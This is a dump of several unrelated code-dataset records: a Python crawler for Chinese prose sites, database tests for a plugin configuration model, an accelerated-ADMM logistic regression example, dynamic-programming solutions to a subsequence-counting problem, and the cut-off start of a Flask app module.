fout:\n # pickle.dump(onePoem, fout)\n # fout.close()\n\n def forward(self):\n self.kind_url = [\n \"http://www.sanwenji.cn/sanwen/shuqing/list_\",\n \"http://www.sanwenji.cn/sanwen/sanwen/shanggan/list_\",\n \"http://www.sanwenji.cn/sanwen/youmeisanwen/list_\",\n \"http://www.sanwenji.cn/sanwen/suibi/list_\",\n \"http://www.sanwenji.cn/sanwen/xiandai/list_\",\n \"http://www.sanwenji.cn/sanwen/sanwen/xiejing/list_\",\n \"http://www.sanwenji.cn/sanwen/sanwen/lizhi/list_\"\n ]\n self.base_name = 'sanwenji/'\n self.kind_name = []\n self.poem_classes = []\n for url in self.kind_url:\n cur_poem_class = url.split('/')[-2]\n self.poem_classes.append(cur_poem_class)\n url = self.base_name + url.split('/')[-2] + '/'\n self.kind_name.append(url)\n\n for u , n , c in zip(self.kind_url, self.kind_name , self.poem_classes):\n self.getOneKindPoem(u,n,c)\n\n self.save(self.dir_to_save)\n\nclass poemChinaSw(poemSpider):\n def __init__(self , base_url=None, dir_to_save=os.path.join(r'E:\\\\PycharmProjects\\\\FirstDayOnMS2\\\\Data\\\\Poem','chinasw/chinasw.json'),base_dir_for_save = r'E:\\\\PycharmProjects\\\\FirstDayOnMS2\\\\Data\\\\Poem',website_to_crawl = '中国散文网'):\n super(poemChinaSw,self).__init__(base_url, dir_to_save,base_dir_for_save,website_to_crawl = website_to_crawl)\n self.tool = WebProxyTool() #中国散文网有反扒机制\n self.crawled_list = []\n self.duplicate_num = 0\n\n def getPage(self,href):\n try:\n crawlable_url = self.tool.getCrawlUrl(href)\n req = requests.get(url=crawlable_url)\n if req.status_code == 404:\n return None\n # req.encoding = \"gb18030\" # in case of Chinese character\n req.encoding = \"utf-8\"\n html = req.text\n bf = BeautifulSoup(html, 'html.parser')\n return bf\n except:\n print(\"getPage Wrong\")\n return None\n\n def getOnePoem(self,href):\n 
try:\n html = self.getPage(href)\n texts = html.select('div[class=\"row-article\"]')[0]\n article = texts.select('h1')[0].get_text()\n content = texts.select('div[class=\"article-content\"]')[0].get_text()\n content = content.replace(\"(中国散文网- www.sanwen.com)\", \"\").split(\"中国散文网首发:http://www.sanwen.com\")[-2]\n print(content)\n return article , content\n except:\n print(href)\n\n def getPoemList(self,target):\n bf = self.getPage(target)\n if bf is None:\n return None\n hrefs_to_crawl = []\n div = bf.select('div[class=\"list-base-article\"]')[0]\n ul = div.select('ul')[0]\n lis = ul.select('li')\n for li in lis:\n a = li.select('a')[0]\n hrefs_to_crawl.append(\"http://www.sanwen.com\" + a['href'])\n return hrefs_to_crawl\n\n def getOneKindPoem(self,base_url, save_dir_base,cur_poem_class):\n pre = base_url + \"list_\"\n post = \".html\"\n # for number in range(20,100):\n for number in range(1, 20):\n print(\"number = \", number)\n url = pre + str(number) + post\n hrefs_to_crawl = self.getPoemList(url)\n if hrefs_to_crawl is None:\n break\n\n for i, ele in enumerate(hrefs_to_crawl):\n print(\"number = \", number, \" i= \", i)\n if ele in self.crawled_list:\n self.duplicate_num += 1\n print(\"duplicat_num = \", self.duplicate_num)\n continue\n else:\n self.crawled_list.append(ele)\n poem_title, poem_content = self.getOnePoem(ele)\n onePoem = poem_title + \"。\" + poem_content\n if len(onePoem) == 0:\n print(\"ele = \", ele)\n continue\n self.num_poems += 1\n temp_dict = {\"poem_id\": self.num_poems,\n 'poem_title': poem_title,\n 'origin_poem': poem_content,\n 'poem_class': cur_poem_class,\n 'url': ele,\n 'website_name': self.website_to_crawl\n }\n self.poems.append(temp_dict)\n '''\n 下面是将这篇散文保存到一个文件夹的逻辑\n '''\n if self.base_dir_for_save:\n save_dir_base = os.path.join(self.base_dir_for_save, save_dir_base)\n if not os.path.exists(save_dir_base):\n os.makedirs(save_dir_base)\n print(\"save_dir_base\", save_dir_base)\n filename = save_dir_base + str(number) + \"__\" + str(i)\n print(\"filename = \", filename)\n with open(filename + \".txt\", \"w\", encoding=\"utf8\") as fout:\n fout.write(\"\\n\".join(onePoem))\n # with open(filename + '.pkl', \"wb\") as fout:\n # pickle.dump(onePoem, fout)\n # fout.close()\n\n def getKindList(self,url):\n try:\n html = self.getPage(url)\n hrefs = []\n divs = html.select('div[class=\"list-article-shanggan\"]')[0]\n\n divs = divs.select('div[class=\"list-article-shanggan-box\"]')\n\n for div in divs:\n li = div.select('li[class=\"head\"]')[0]\n\n a = li.select('a')[0]\n hrefs.append(\"http://www.sanwen.com\" + a['href'])\n return hrefs\n except:\n print(\"url = \", url)\n\n def forward(self):\n if self.base_url is None:\n self.base_url = \"http://www.sanwen.com/sanwen/jingdiansanwen/\"\n self.kind_url = self.getKindList(self.base_url)\n print(\"kind_url = \", self.kind_url)\n print(\"len = \", len(self.kind_url))\n self.poem_classes = [url.split('/')[-2] for url in self.kind_url]\n self.poem_classes = [re.sub('sanwen','',url) for url in self.poem_classes]\n print(\"poem_classes = \",self.poem_classes)\n self.base_name = 'chinasw/'\n self.kind_name = []\n for url in self.kind_url:\n url = self.base_name + url.split('/')[-2]+'/'\n print(\"url = \",url)\n self.kind_name.append(url)\n for u , n ,c in zip(self.kind_url,self.kind_name,self.poem_classes):\n try:\n self.getOneKindPoem(u,n,c)\n except:\n print(\"u = \",u)\n print(\"n = \",n)\n print(\"breaked\")\n self.save()\n\nclass poemDusanwen(poemSpider):\n def __init__(self , base_url=None, 
dir_to_save=os.path.join(r'E:\\\\PycharmProjects\\\\FirstDayOnMS2\\\\Data\\\\Poem','dusanwen/dusanwen.json'),base_dir_for_save = r'E:\\\\PycharmProjects\\\\FirstDayOnMS2\\\\Data\\\\Poem',website_to_crawl = '文章阅读网'):\n super(poemDusanwen,self).__init__(base_url, dir_to_save,base_dir_for_save,website_to_crawl = website_to_crawl)\n self.tool = WebProxyTool() #中国散文网有反扒机制\n self.crawled_list = []\n self.duplicate_num = 0\n\n def makePoemObject(self, main_class, sub_class, href, page_title, Jokes):\n New_Jokes = []\n for joke in Jokes:\n joke = [re.sub(r'\\(.*\\)|(.*)', '', ele) for ele in joke]\n joke = [re.sub(r'^(0|1|2|3|4|5|6|7|8|9|0)',\"\",ele) for ele in joke]\n\n one_joke = {\n 'main_class':main_class,'sub_class':sub_class,\n 'url': href, 'page_title': page_title, \"content\": joke\n }\n New_Jokes.append(one_joke)\n return New_Jokes\n\nif __name__ == \"__main__\":\n pass\n # spiderOnsanwenji= poemSanwenji(base_url=None)\n # spiderOnsanwenji.forward()\n # goon = input(\"go on? [Y/N]\")\n # if not( goon.lower() == \"y\" or goon.lower() == \"yes\" ):\n # exit(90)\n # poemSpiderOnchinasw = poemChinaSw(base_url=\"http://www.sanwen.com/sanwen/jingdiansanwen/\")\n # poemSpiderOnchinasw.forward()\n\n","sub_path":"Model/Poem/crawlPoem.py","file_name":"crawlPoem.py","file_ext":"py","file_size_in_byte":14106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"225917915","text":"# encoding: utf-8\nfrom .. import DatabaseTest\nfrom ...model import create\n\nimport unittest\nfrom mock import MagicMock\nfrom nose.tools import assert_raises\n\nfrom ...model.plugin_configuration import PluginConfiguration\nfrom ...model.library import Library\n\n# Varibles for test cases\nLIB_ID = 1\n\nclass TestPluginGetValues(DatabaseTest):\n def test_plugin_get_saved_values_lib_not_valid(self):\n class MockPlugin(PluginConfiguration):\n def __init__(self, *args, **kwargs):\n pass\n\n def _get_library_from_short_name(self, library_short_name):\n return Library(id=LIB_ID, short_name=\"T1\")\n\n mocked_plugin = MockPlugin()\n assert_raises(Exception, mocked_plugin.get_saved_values, \"a lib\", \"a plugin\")\n\n def test_plugin_get_saved_values_error_querying_db(self):\n class MockPlugin(PluginConfiguration):\n def __init__(self, *args, **kwargs):\n pass\n\n def _get_saved_values(*args, **kwargs):\n raise Exception\n\n def _get_library_from_short_name(self, library_short_name):\n return Library(id=LIB_ID, short_name=\"T1\")\n\n mocked_plugin = MockPlugin()\n assert_raises(Exception, mocked_plugin.get_saved_values, \"a lib\", \"a plugin\")\n\n\nclass TestPluginSaveValues(DatabaseTest):\n class MockPlugin(PluginConfiguration):\n def __init__(self, *args, **kwargs):\n pass\n\n def test_library_not_found(self):\n plugin = PluginConfiguration()\n assert_raises(Exception, plugin.save_values, \"library\", \"plugin\", {})\n\n def test_insert_value_db_empty(self):\n library, ignore = create(\n self._db, Library, id=LIB_ID, name=\"Lib\", short_name=\"L1\"\n )\n \n plugin_name = \"plugin\"\n key = \"key-to-test\"\n val = \"value to test\"\n data = {key: val}\n\n plugin = PluginConfiguration()\n plugin._perform_db_operations = MagicMock()\n plugin.save_values(self._db, library.short_name, plugin_name, data)\n\n plugin._perform_db_operations.assert_called_with(self._db,\n [{\n \"lib_id\": LIB_ID,\n \"target_key\": plugin_name + \".\" + key,\n \"value\": val\n }],\n [],\n [],\n )\n\n def test_insert_value_with_another_data_existing_in_db(self):\n library, ignore = create(\n self._db, 
Library, id=LIB_ID, name=\"Lib\", short_name=\"L1\"\n )\n \n pname = \"plugin\"\n new_key = \"key-to-test\"\n new_val = \"value to test\"\n key_to_keep = \"key-to-keep\"\n val_to_keep = \"val to keep\"\n\n data = {new_key: new_val, key_to_keep: val_to_keep}\n\n _, _ = create(\n self._db, PluginConfiguration, id=1, library_id=library.id, key=pname+\".\"+key_to_keep,\n _value=val_to_keep\n )\n\n plugin = PluginConfiguration()\n plugin._perform_db_operations = MagicMock()\n plugin.save_values(self._db, library.short_name, pname, data)\n\n plugin._perform_db_operations.assert_called_with(self._db,\n [{\n \"lib_id\": LIB_ID,\n \"target_key\": pname + \".\" + new_key,\n \"value\": new_val\n }],\n [],\n [] )\n def test_update_values(self):\n library, ignore = create(\n self._db, Library, id=LIB_ID, name=\"Lib\", short_name=\"L1\"\n )\n \n pname = \"plugin\"\n key_to_update = \"key-to-keep\"\n new_val = \"val to keep\"\n \n data = {key_to_update: new_val}\n\n plugin_instance, _ = create(\n self._db, PluginConfiguration, id=1, library_id=library.id, key=pname+\".\"+key_to_update,\n _value=new_val+\" old\"\n )\n\n plugin = PluginConfiguration()\n plugin._perform_db_operations = MagicMock()\n plugin.save_values(self._db, library.short_name, pname, data)\n\n plugin._perform_db_operations.assert_called_with(self._db,\n [],\n [{\n \"lib_id\": LIB_ID,\n \"target_key\": pname + \".\" + key_to_update,\n \"value\": new_val\n }],\n [] )\n\n def test_delete_value(self):\n library, ignore = create(\n self._db, Library, id=LIB_ID, name=\"Lib\", short_name=\"L1\"\n )\n \n pname = \"plugin\"\n key_to_delete = \"key-to-keep\"\n val_to_delete = \"val to keep\"\n \n data = {}\n\n plugin_instance, _ = create(\n self._db, PluginConfiguration, id=1, library_id=library.id, key=pname+\".\"+key_to_delete,\n _value=val_to_delete\n )\n\n plugin = PluginConfiguration()\n plugin._perform_db_operations = MagicMock()\n plugin.save_values(self._db, library.short_name, pname, data)\n\n plugin._perform_db_operations.assert_called_with(self._db,\n [],\n [],\n [{\n \"lib_id\": LIB_ID,\n \"target_key\": pname + \".\" + key_to_delete,\n }])\n\nclass TestPluginGetSavedValues(DatabaseTest):\n def test_plugin_empty_values(self):\n library, ignore = create(\n self._db, Library, id=LIB_ID, name=\"Lib\", short_name=\"L1\"\n )\n plugin = PluginConfiguration()\n saved_values = plugin._get_saved_values(self._db, library, \"any_plugin\")\n assert saved_values == {}\n\n def test_plugin_find_values(self):\n pname = \"plugin_name\"\n key1 = \"key1\"\n value1 = \"value1\"\n key2 = \"key2\"\n value2 = \"value2\"\n\n library, ignore = create(\n self._db, Library, id=LIB_ID, name=\"Lib\", short_name=\"L1\"\n )\n\n plugin1, ignore = create(\n self._db, PluginConfiguration, id=1, library_id=library.id, key=pname+\".\"+key1, _value=value1\n )\n plugin2, ignore = create(\n self._db, PluginConfiguration, id=2, library_id=library.id, key=pname+\".\"+key2, _value=value2\n )\n \n plugin = PluginConfiguration()\n saved_values = plugin._get_saved_values(self._db, library, pname)\n assert key1 in saved_values\n assert saved_values[key1] == value1\n assert key2 in saved_values\n assert saved_values[key2] == value2\n\n\nclass TestPluginFromShortName(DatabaseTest):\n def test_plugin_find_library(self):\n name = \"Test Library Name\"\n short_name = \"T1\"\n inserted_library, ignore = create(\n self._db, Library, id=LIB_ID, name=name, short_name=short_name\n )\n\n plugin = PluginConfiguration()\n library = plugin._get_library_from_short_name(self._db, short_name)\n 
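Taken together, these tests pin down the contract of `save_values`: it must partition the incoming dict into insert, update, and delete operations whose `target_key` is namespaced as `plugin_name + "." + key`, and hand the three lists to `_perform_db_operations`. A hypothetical sketch of that partitioning (the real `PluginConfiguration` internals are not shown in this record):

```python
# Hypothetical partitioning consistent with the assertions above; note the
# delete entries carry no "value" key, matching test_delete_value.
def partition_changes(lib_id, plugin_name, new_data, saved_data):
    prefix = plugin_name + "."
    inserts, updates, deletes = [], [], []
    for key, value in new_data.items():
        op = {"lib_id": lib_id, "target_key": prefix + key, "value": value}
        if key not in saved_data:
            inserts.append(op)
        elif saved_data[key] != value:
            updates.append(op)
    for key in saved_data:
        if key not in new_data:
            deletes.append({"lib_id": lib_id, "target_key": prefix + key})
    return inserts, updates, deletes
```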
assert library.name == inserted_library.name \n assert library.id == inserted_library.id\n assert library.short_name == inserted_library.short_name\n\n def test_plugin_dont_find_library(self):\n plugin = PluginConfiguration()\n assert_raises(Exception, plugin._get_library_from_short_name, self._db, \"any_name\")\n\n","sub_path":"tests/models/test_plugin_configuration.py","file_name":"test_plugin_configuration.py","file_ext":"py","file_size_in_byte":8273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"517291698","text":"import sys\nsys.path.append('../')\n\nfrom aa_admm.base_test import *\nfrom aa_admm.solver import *\n\nclass TestExamples(BaseTest):\n \"\"\" Unit tests for different examples \"\"\"\n \n def setUp(self):\n np.random.seed(1)\n self.rho = 10\n self.lambda_ = 2\n self.dataA = None\n self.y = None\n self.m = None\n self.n = None\n self.z_true_approx = None\n self.J = None\n self.es = None\n self.beta12 = None\n self.beta123 = None\n self.rho_M = None\n self.rho_T2 = None\n self.rho_T3 = None\n self.residuals = None\n self.errors = None\n self.eps_abs = 1e-16\n self.eps_rel = 1e-16\n self.maxit = 100\n \n def update_x(self, z, u, x0=None):\n # solve the x update\n # minimize [ -logistic(x_i) + (rho/2)||x_i - z^k + u^k||^2 ]\n # via Newton's method; for a single subsystem only.\n alpha = 0.1\n BETA = 0.5\n TOLERANCE = 1e-15\n MAX_ITER = 100\n yA = np.diag(np.ravel(self.y)) @ self.dataA\n I = np.eye(self.n+1)\n\n if (x0 is not None):\n x = x0\n else:\n x = np.zeros(self.n+1)\n\n C = np.c_[-self.y, -yA]\n f = lambda w: np.average(np.log(1 + np.exp(C@w))) + (self.rho/2)*np.linalg.norm(w - z + u)**2\n for iter in range(MAX_ITER):\n fx = f(x)\n g = C.T @ ( np.exp(C@x) / (1 + np.exp(C@x)) ) / self.m + self.rho*(x - z + u)\n H = C.T @ np.diag(np.ravel( np.exp(C@x) / (1 + np.exp(C@x))**2 )) @ C / self.m + self.rho*I\n dx = np.linalg.solve(-H,g) # Newton step\n dfx = g.T @ dx # Newton decrement\n if abs(dfx) < TOLERANCE:\n break\n\n # backtracking\n t = 1\n while f(x + t*dx) > fx + alpha*t*dfx:\n t = BETA*t\n\n x = x + t*dx\n\n return x\n \n def compute_rho_M(self):\n if self.z_true_approx is None:\n raise ValueError('Approximate true solution has not been evaluated!')\n z = self.z_true_approx.copy()\n # Use finite difference to get approximate gradient of ADMM iterations\n ep = 1e-4;\n J = np.zeros((self.n+1, self.n+1)); # Can be refined to store only n(n+1)/2 entries since Z is symmetric\n for j in range(self.n+1):\n h = np.zeros(self.n+1)\n h[j] = ep\n\n zph = z + h\n zmh = z - h\n\n uph = 2*self.lambda_*zph/self.rho\n umh = 2*self.lambda_*zmh/self.rho\n\n # perform one admm step to compute q(z+h)\n xph = self.update_x(zph, uph, z)\n zph = self.rho * (xph+uph) / (2*self.lambda_+self.rho)\n\n # perform one admm step to compute q(z-h)\n xmh = self.update_x(zmh, umh, z)\n zmh = self.rho * (xmh+umh) / (2*self.lambda_+self.rho)\n\n J[:,j] = np.ravel((zph-zmh)/2/ep)\n\n self.J = J\n # Compute the spectrum of Jacobian J\n self.es = scipy.linalg.eigvals(J)\n self.rho_M = max(abs(self.es))\n \n def test_regularized_logistic_regression(self):\n # Problem data.\n self.dataA = np.loadtxt('./data/madelon/madelon_train.data')[::10,::2]\n self.y = np.loadtxt('./data/madelon/madelon_train.labels')[::10]\n self.m, self.n = self.dataA.shape\n \n admm_update = [lambda z, u: self.update_x(z, u),\n lambda x, u: self.rho * (x+u) / (2*self.lambda_+self.rho),\n lambda z: 2*self.lambda_*z/self.rho]\n\n \n # Set A, B, b\n A = np.eye(self.n+1)\n B = 
-np.eye(self.n+1)\n b = np.zeros(self.n+1)\n \n # Compute results\n self.z_true_approx, _, _, self.c20, _ = AA_ADMM_Z(admm_update, A, B, b, 20, self.rho, self.maxit, self.eps_abs, self.eps_rel)\n _, r0, e0, _, t0 = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, solIsApprox=True)\n _, r1, e1, self.c1, t1 = AA_ADMM_Z(admm_update, A, B, b, 1, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, solIsApprox=True)\n _, r2, e2, self.c2, t2 = AA_ADMM_Z(admm_update, A, B, b, 2, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, solIsApprox=True) \n _, r3, e3, self.c3, t3 = AA_ADMM_Z(admm_update, A, B, b, 3, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, solIsApprox=True) \n _, r5, e5, self.c5, t5 = AA_ADMM_Z(admm_update, A, B, b, 5, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, solIsApprox=True) \n _, r10, e10, self.c10, t10 = AA_ADMM_Z(admm_update, A, B, b, 10, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, solIsApprox=True) \n #_, r10, e10, self.c20, _ = AA_ADMM_Z(admm_update, A, B, b, 20, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, solIsApprox=True)\n \n # Compute beta in sAA(1)-ADMM\n self.compute_rho_M()\n print(self.rho_M)\n beta = (1-np.sqrt(1-self.rho_M))/(1+np.sqrt(1-self.rho_M)) # beta for sAA(1)\n self.beta12, self.rho_T2 = opt_sAA2_coeff(self.es) # beta1, beta2 for sAA(2)\n# self.beta123, self.rho_T3 = opt_sAA3_coeff(self.es, np.arange(0.5,0.81,0.005), np.arange(-0.2,0.01,0.005), np.arange(0,0.03,0.001)) # beta1, beta2, beta3 for sAA(3)\n self.beta123 = (0.61, -0.115, 0.009)\n self.rho_T3 = 0.3642705722804524\n print(1-np.sqrt(1-self.rho_M)) # rho(T) of sAA(1)\n print(self.rho_T2) # rho(T2) of sAA(2)\n print(self.rho_T3) # rho(T3) of sAA(3)\n \n _, r_sAA1, e_sAA1, _, _ = AA_ADMM_Z(admm_update, A, B, b, 1, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, use_sAA=True, beta=beta, solIsApprox=True)\n _, r_sAA2, e_sAA2, _, _ = AA_ADMM_Z(admm_update, A, B, b, 2, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, use_sAA=True, beta=self.beta12, solIsApprox=True)\n _, r_sAA3, e_sAA3, _, _ = AA_ADMM_Z(admm_update, A, B, b, 3, self.rho, self.maxit, self.eps_abs, self.eps_rel, z_true=self.z_true_approx, use_sAA=True, beta=self.beta123, solIsApprox=True)\n \n # accelerate ADMM by over-relaxation ('relax' = 1.9 gives the best convergence)\n# _, _, e_rx1, _, t_rx1 = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, relaxation=1.1, z_true=self.z_true_approx, solIsApprox=True)\n# _, _, e_rx2, _, t_rx2 = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, relaxation=1.2, z_true=self.z_true_approx, solIsApprox=True)\n# _, _, e_rx3, _, t_rx3 = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, relaxation=1.3, z_true=self.z_true_approx, solIsApprox=True)\n# _, _, e_rx4, _, t_rx4 = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, relaxation=1.4, z_true=self.z_true_approx, solIsApprox=True)\n# _, _, e_rx5, _, t_rx5 = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, relaxation=1.5, z_true=self.z_true_approx, solIsApprox=True)\n# _, _, e_rx6, _, t_rx6 = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, 
relaxation=1.6, z_true=self.z_true_approx, solIsApprox=True)\n# _, _, e_rx7, _, t_rx7 = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, relaxation=1.7, z_true=self.z_true_approx, solIsApprox=True)\n# _, _, e_rx8, _, t_rx8 = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, relaxation=1.8, z_true=self.z_true_approx, solIsApprox=True)\n _, _, e_rx, _, t_rx = AA_ADMM_Z(admm_update, A, B, b, 0, self.rho, self.maxit, self.eps_abs, self.eps_rel, relaxation=1.9, z_true=self.z_true_approx, solIsApprox=True)\n \n # store residuals results\n self.errors = [e0, e1, e2, e3, e5, e10, e_rx, e_sAA1, e_sAA2, e_sAA3]\n self.timings = [t0, t1, t2, t3, t5, t10, t_rx]\n \n def plot_aa_admm_errors(self):\n # Plot errors comparing ADMM and AA-ADMM\n e_sAA = self.errors[6]\n rho_ref1 = (e_sAA[0]+0.05) * np.power((1-np.sqrt(1-self.rho_M)), np.linspace(0, 40, 41))\n rho_ref2 = (e_sAA[0]+0.2) * np.power(self.rho_T2, np.linspace(0, 36, 37))\n rho_ref3 = (e_sAA[0]+0.03) * np.power(self.rho_T3, np.linspace(0, 31, 32))\n self.plot_results(self.errors + [rho_ref1, rho_ref2, rho_ref3], \\\n labels=['ADMM', 'AA(1)-ADMM', 'AA(2)-ADMM', 'AA(3)-ADMM', 'AA(5)-ADMM', 'AA(10)-ADMM', \\\n 'rADMM(1.6)', 'sAA(1)-ADMM', 'sAA(2)-ADMM', 'sAA(3)-ADMM', \\\n r'$\\rho^*_{sAA(1)}$', r'$\\rho^*_{sAA(2)}$', r'$\\rho^*_{sAA(3)}$'], \\\n linestyles=['-', '-', '-', '-', '-', '-', '-.', '-.', '-.', '-.', ':', ':', ':'],\\\n colors=['k', 'r', 'g', 'b', 'c', 'gray', 'm', 'r', 'g', 'b', 'r', 'g', 'b'],\\\n linewidths=[3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 2.5, 2.5, 2.5, 2.5, 1.5, 1.5, 1.5], \\\n pltError=True,\\\n maxIt=82,\\\n filename='iters_logreg.png')\n \n def plot_saa_admm_errors(self):\n # Plot errors comparing ADMM and sAA-ADMM\n e_sAA = self.errors[-1]\n rho_ref1 = e_sAA[0] * np.power((1-np.sqrt(1-self.rho_M)), np.linspace(0, 40, 41))\n rho_ref2 = e_sAA[0] * np.power(self.rho_T2, np.linspace(0, 40, 41))\n rho_ref3 = e_sAA[0] * np.power(self.rho_T3, np.linspace(0, 31, 32))\n self.plot_results([self.errors[0]]+self.errors[7:]+[rho_ref1, rho_ref2, rho_ref3], \\\n labels=['ADMM', 'sAA(1)-ADMM', 'sAA(2)-ADMM', 'sAA(3)-ADMM',\\\n r'$\\rho^*_{sAA(1)}$', r'$\\rho^*_{sAA(2)}$', r'$\\rho^*_{sAA(3)}$'], \\\n linestyles=['-', '-', '-', '-', '--', '--', '--'],\n pltError=True,\n maxIt=82)\n \n# def plot_radmm_errors(self):\n# # Plot errors comparing ADMM and relaxed-ADMM\n# self.plot_results(self.relax_errors, \\\n# labels=['rADMM(1.1)', 'rADMM(1.2)', 'rADMM(1.3)', 'rADMM(1.4)', 'rADMM(1.5)', 'rADMM(1.6)', 'rADMM(1.7)', 'rADMM(1.8)', 'rADMM(1.9)'], \\\n# linestyles=['-','-', '-', '-', '-', '-', '-', '-', '-'],\n# pltError=True)\n \n def plot_timings(self):\n self.plot_results(self.errors[:7], ts=self.timings, \\\n labels=['ADMM', 'AA(1)-ADMM', 'AA(2)-ADMM', 'AA(3)-ADMM', 'AA(5)-ADMM', 'AA(10)-ADMM', 'rADMM(1.9)'],\n linestyles=['-', '-', '-', '-', '-', '-', '-'],\\\n colors=['k', 'r', 'g', 'b', 'c', 'gray', 'm'],\\\n linewidths=[3.5, 3.5, 3.5, 3.5, 3.5, 3.5, 3.5], \\\n pltError=True,\\\n maxIt=82,\\\n filename='timing_logreg.png')\n \n def plot_eigs(self):\n if self.es is None or self.J is None:\n raise ValueError('The Jacobian and spectrum have not been evaluated!')\n # plot eigs of q'\n X = [e.real for e in self.es]\n Y = [e.imag for e in self.es]\n plt.scatter(X, Y, marker='*', label=r\"$\\sigma(q'(x^*))$\")\n \n # plot eigs of accelerated iteration matrix T\n beta = (1-np.sqrt(1-self.rho_M))/(1+np.sqrt(1-self.rho_M))\n T = np.block([\n [(1+beta)*self.J, -beta*self.J],\n 
[np.eye(self.J.shape[1]), np.zeros(self.J.shape)]\n ])\n eigsT = scipy.linalg.eigvals(T)\n X = [e.real for e in eigsT]\n Y = [e.imag for e in eigsT]\n plt.scatter(X, Y, marker='*', label=r\"$\\sigma(\\Psi'(X^*))$\")\n \n # plot eigs of sAA(2) accelerated matrix T2\n beta1, beta2 = self.beta12\n I = np.eye(self.n+1)\n O = np.zeros((self.n+1, self.n+1))\n T2 = np.block([\n [(1+beta1+beta2)*self.J, -beta1*self.J, -beta2*self.J],\n [I, O, O ],\n [O, I, O ]\n ])\n eigsT2 = scipy.linalg.eigvals(T2)\n X = [e.real for e in eigsT2]\n Y = [e.imag for e in eigsT2]\n plt.scatter(X, Y, marker='*', label=r\"$\\sigma(\\Psi_2'(X^*))$\")\n \n # plot eigs of sAA(3) accelerated matrix T3\n beta1, beta2, beta3 = self.beta123\n T3 = np.block([\n [(1+beta1+beta2+beta3)*self.J, -beta1*self.J, -beta2*self.J, -beta3*self.J],\n [I, O, O, O],\n [O, I, O, O],\n [O, O, I, O]\n ])\n eigsT3 = scipy.linalg.eigvals(T3)\n X = [e.real for e in eigsT3]\n Y = [e.imag for e in eigsT3]\n plt.scatter(X, Y, marker='*', label=r\"$\\sigma(\\Psi_3'(X^*))$\")\n plt.xticks(fontsize=15)\n plt.yticks(fontsize=15)\n \n plt.xlim(left=0)\n plt.legend(prop={'size': 14},loc=\"upper right\")\n plt.savefig('eigs_logreg.png')\n plt.show()\n\nif __name__ == '__main__':\n tests = TestExamples()\n tests.setUp()\n tests.test_regularized_logistic_regression()\n tests.plot_aa_admm_errors()\n# tests.plot_saa_admm_errors()\n tests.plot_timings()\n tests.plot_eigs()\n","sub_path":"examples/reg_logistic_regression.py","file_name":"reg_logistic_regression.py","file_ext":"py","file_size_in_byte":13560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"180402887","text":"# Baseline backtracking version; exceeds the time limit (TLE)\n\nclass Solution:\n def numDistinct(self, s, t):\n self.ans = 0\n self.helper(s, t, 0)\n return self.ans\n\n def helper(self, s, t, index):\n\n if index == len(t):\n self.ans += 1\n return\n for i in range(len(s)):\n if s[i] == t[index]:\n self.helper(s[i + 1:], t, index + 1)\n\n# Use a memoization trick to speed up the backtracking; barely AC (accepted)\nclass Solution:\n def numDistinct(self, s, t):\n self.ans = 0\n hashmap = {}\n self.helper(s, t, 0, hashmap)\n return self.ans\n\n def helper(self, s, t, index, map):\n\n if index == len(t):\n self.ans += 1\n return\n if s + str(index) in map:\n self.ans += map[s + str(index)]\n return\n for i in range(len(s)):\n if s[i] == t[index]:\n tmp = self.ans\n self.helper(s[i + 1:], t, index + 1, map)\n increment = self.ans - tmp\n map[s[i + 1:] + str(index + 1)] = increment\n \n# DP\nclass Solution:\n def numDistinct(self, s: str, t: str) -> int:\n n1 = len(s)\n n2 = len(t)\n # dp covers prefixes of length 0 through n, hence size n+1\n dp = [[0] * (n1 + 1) for _ in range(n2 + 1)]\n # dp[i][j] = number of times the subsequence formed by the first i chars of T appears in the first j chars of S\n # the empty string is a subsequence of any string, so dp[0][j] = 1\n for j in range(n1 + 1):\n dp[0][j] = 1\n for i in range(1, n2 + 1):\n for j in range(1, n1 + 1):\n # t[i - 1] is the i-th character, matching the \"first i characters\" that dp[i][j] refers to\n if t[i - 1] == s[j - 1]:\n dp[i][j] = dp[i - 1][j - 1] + dp[i][j - 1]\n else:\n dp[i][j] = dp[i][j - 1]\n #print(dp)\n return dp[-1][-1]\n","sub_path":"dp/Distinct_Subsequences.py","file_name":"Distinct_Subsequences.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"79959868","text":"# -*- coding: utf-8 -*-\n'''The app module, containing the app factory function.'''\nfrom flask import Flask, render_template\nfrom werkzeug.security import check_password_hash\n\nfrom nektime.settings import ProdConfig\nfrom nektime.assets import assets\nfrom nektime.extensions import (\n bcrypt,\n cache,\n db,\n login_manager,\n migrate,\n
